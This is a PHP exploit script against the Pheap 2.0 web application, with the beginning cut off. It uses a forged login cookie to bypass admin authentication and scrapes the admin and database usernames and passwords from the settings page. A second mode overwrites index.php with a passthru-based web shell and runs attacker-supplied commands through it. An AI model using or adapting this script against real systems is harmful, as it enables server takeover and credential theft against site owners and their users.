#!/usr/bin/php -q -d short_open_tag=on '/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} if ($exploit==0){ print "-------------------------------------------------------------------------\r\n"; print " Pheap 2.0 Admin Bypass/Remote Code Execution\r\n"; print "-------------------------------------------------------------------------\r\n"; $packet ="GET " . $path . "settings.php HTTP/1.1\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Cookie: pheap_login=" . $user . "\r\n"; $packet.="Connection: Close\r\n\r\n"; sendpacketii($packet); if (strstr($html,"This is the settings panel")){} else{echo "...Failed!\r\n"; exit();} $temp=explode("name=\"user_name\" class=\"ieleft\" value=\"",$html); $temp2=explode("\" /> :Username",$temp[1]); $ret_user=$temp2[0]; echo "[+] Admin User: " . $ret_user . "\r\n"; $temp=explode("name=\"password\" class=\"ieleft\" value=\"",$html); $temp2=explode("\" /> :Password",$temp[1]); $ret_user=$temp2[0]; echo "[+] Admin Pass: " . $ret_user . "\r\n"; $temp=explode("name=\"dbhost\" class=\"ieleft\" id=\"dbhost\" value=\"",$html); $temp2=explode("\" /> :Database Host",$temp[1]); $ret_user=$temp2[0]; echo "[+] Database Host: " . $ret_user . "\r\n"; $temp=explode("name=\"dbuser\" class=\"ieleft\" id=\"dbuser\" value=\"",$html); $temp2=explode("\" /> :Database Username",$temp[1]); $ret_user=$temp2[0]; echo "[+] Database User: " . $ret_user . "\r\n"; $temp=explode("name=\"dbpass\" class=\"ieleft\" id=\"dbpass\" value=\"",$html); $temp2=explode("\" /> :Database Password",$temp[1]); $ret_user=$temp2[0]; echo "[+] Database Pass: " . $ret_user . "\r\n"; print "-------------------------------------------------------------------------\r\n"; print " http://www.w4ck1ng.com\r\n"; print " ...Silentz\r\n"; print "-------------------------------------------------------------------------\r\n"; } if($exploit==1){ $packet ="GET " . $path . "edit.php?em=file&filename=" . $path . "index.php HTTP/1.1\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Cookie: pheap_login=" . $user . "\r\n"; $packet.="Connection: Close\r\n\r\n"; sendpacketii($packet); $temp=explode("name=\"filename\" value=\"",$html); $temp2=explode("\">",$temp[1]); $fullpath=$temp2[0]; $shell = '...Silentz";ini_set("max_execution_time",0);passthru($_GET[cmd]);echo "...Silentz";?>'; $data = "mce_editor_0_styleSelect="; $data .= "&mce_editor_0_formatSelect="; $data .= "&mce_editor_0_fontNameSelect="; $data .= "&mce_editor_0_fontSizeSelect=0"; $data .= "&mce_editor_0_zoomSelect=100%25"; $data .= "&content=" . urlencode($shell); $data .= "&filename=" . urlencode($fullpath); $data .= "&update_text.x=57"; $data .= "&update_text.y=15"; $packet ="POST " . $path . "edit.php?action=update_doc HTTP/1.1\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="Accept: */*\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Cookie: pheap_login=" . $user . "\r\n"; $packet.="Referer: http://" . $host.$path . "edit.php?em=file&filename=" . $path . "index.php\r\n"; $packet.="Connection: Close\r\n\r\n"; $packet.=$data; sendpacketii($packet); $packet ="GET " . $path . "index.php?cmd=" . $cmd . " HTTP/1.1\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Connection: Close\r\n\r\n"; sendpacketii($packet); if (strstr($html,"...Silentz")) { print "-------------------------------------------------------------------------\r\n"; print " Pheap 2.0 Admin Bypass/Remote Code Execution\r\n"; print "-------------------------------------------------------------------------\r\n"; $temp=explode("...Silentz",$html); $temp2=explode("",$temp[1]); echo "===============================================================\r\n\r\n"; echo $temp2[0]; echo "\r\n===============================================================\r\n"; echo "\r\n[+] Shell...http://" .$host.$path. "index.php?cmd=[COMMAND]\r\n"; print "-------------------------------------------------------------------------\r\n"; print " http://www.w4ck1ng.com\r\n"; print " ...Silentz\r\n"; print "-------------------------------------------------------------------------\r\n"; die; } } ?>